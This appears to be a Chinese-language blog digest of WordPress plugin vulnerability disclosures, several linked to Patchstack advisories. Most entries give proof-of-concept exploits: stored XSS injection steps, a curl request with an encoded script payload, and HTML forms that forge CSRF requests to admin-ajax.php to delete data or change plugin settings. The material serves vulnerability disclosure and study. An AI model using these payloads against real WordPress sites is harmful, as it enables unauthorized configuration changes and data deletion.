详细漏洞信息请查看: https://patchstack.com/database/vulnerability/read-more/wordpress-read-more-by-adam-plugin-1-1-8-cross-site-request-forgery-csrf-vulnerability
Category: Wordpress Plugins Vulnerabilities
Wordpress Plugins Vulnerabilities
WordPress Add Shortcodes Actions And Filters plugin <= 2.0.9 管理员后台出现XXS漏洞
POC如下: Dashboard—->Tools—->Shortcodes,Actions and Filters—->Add New —->fill name with “> and then fill any value with others. and then click “save” botton after done that,there would be the stored xxs 主要还是因为一些特殊字符如>等没有过滤从而导致了存储型的XXS
WordPress YDS Support Ticket System plugin <= 1.0 -CSRF漏洞
由于缺少对权限的控制以及nonce的判断,从而导致CSRF漏洞 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=deleteCategory" method="POST" enctype="multipart/form-data"> < input type="hidden" name="catId" value="1"> < input type="submit" name="Submit"> < /form> < /body> < /html> 提交完后从而修改了CATID的值
WordPress PCA Predict plugin <= 1.0.3 管理员后台的XXS漏洞
由于缺少对特殊字符的过滤导致后台出现XXS漏洞 POC如下: Dashboard—->Settings—->PCA Predict—>—->把这串代码填入 “> 然后保存即可看到XXS
WordPress add2fav plugin <= 1.0 - XSS漏洞
由于没有过滤一些字符,从而导致可以构造闭合,并造成XSS POC如下: curl ‘http://exsample.com/wp-admin/options-general.php?page=add2fav_uid’ –data ‘add2fav_hidden=Y&add2fav_label_add= %22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript %3E&add2fav_label_rem=Remove+from+Favorites &add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes’
WordPress WP Shop plugin <= 3.9.6 - 任意用户CSRF导致数据更新和删除
由于没有对AJAX进行有效的权限判断和NONCE验证,从而导致任意用户都可以更改插件的配置 以及对一些重要数据的删除 详细情况请看这里:https://patchstack.com/database/vulnerability/wp-shop-original/wordpress-wp-shop-plugin-3-9-6-unauthenticated-plugin-settings-change-data-deletion-vulnerabilities
WordPress Add User Role plugin <= 0.0.1 - XXS漏洞
由于没有对一些特殊字符过滤,便可以添加闭合字符,从而导致XXS漏洞 POC如下: Dashboard—->Users—->My Role—>Create new user—->fill the Role Name with “> and then click the “add user”
access-code-feeder < 1.0.3 subscriber权限下CSRF导致的插件更新
POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data"> < input type="hidden" name="new_url" value="http://www.google.com"> < input type="submit" name="Submit"> < /form> < /body> < /html> 漏洞详情:https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability
about-me < = 1.0.12 subscriber权限下 CSRF导致插件配置更新
POC如下 < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=social_links_delete_network" method="POST" enctype="multipart/form-data"> < input type="hidden" name="linkId" value="1"> < input type="submit" name="Submit"> < /form> < /body> < /html> 执行完会导致直接删除了ID为1的社交网络帐号
about-rentals < = 1.5 任意用户未经授权的函数调用导致配置更新
由于没有对AJAX异常函数调用进行NONCE的验证和角色权限的判断,从而导致了任意用户未经授权的函数调用导致配置更新 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=abr_update_search_settings" method="POST" enctype="multipart/form-data"> < input type="hidden" name="value" value="200"> < input type="submit" name="Submit"> < /form> < /body> < /html> 从而导致修改了插件的配置